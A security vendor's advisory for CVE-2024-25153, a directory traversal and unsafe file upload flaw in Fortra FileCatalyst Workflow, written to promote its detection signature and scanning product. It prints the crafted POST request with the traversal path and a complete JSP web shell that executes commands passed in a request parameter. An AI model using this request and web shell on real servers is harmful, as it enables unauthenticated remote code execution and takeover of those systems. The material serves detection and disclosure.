Application Details
Fortra FileCatalyst Workflow is a web portal used to transfer files of all sizes, including terabytes. Allowing users to store files in the organization’s local storage or private cloud for collaboration.
Vulnerability
A critical Unsafe File Upload and Directory Traversal vulnerability in Fortra FileCatalyst allows a remote unauthenticated attacker to gain Remote Code Execution (RCE) on the web server.
Identification
A directory traversal within the ‘ftpservlet’ of the FileCatalyst Workflow Web Portal allows files to be uploaded outside of the intended ‘uploadtemp’ directory with a specially crafted POST request. In situations where a file is successfully uploaded to web portal’s DocumentRoot, specially crafted JSP files could be used to execute code, including web shells.
POST /workflow/servlet/ftpservlet?wf=octetStream&h=example.com&u=XX&p=XX&prt=21&c=PUT&sid=CVE-2024-25153/../../CVE-2024-25153/
PAYLOAD -
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>Detection
By turning this into a traffic file and matching rule, we are able to detect attempts to to execute code, including web shells.
Coverage
Idappcom have created signature 8024757 along with a traffic file for this vulnerability.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional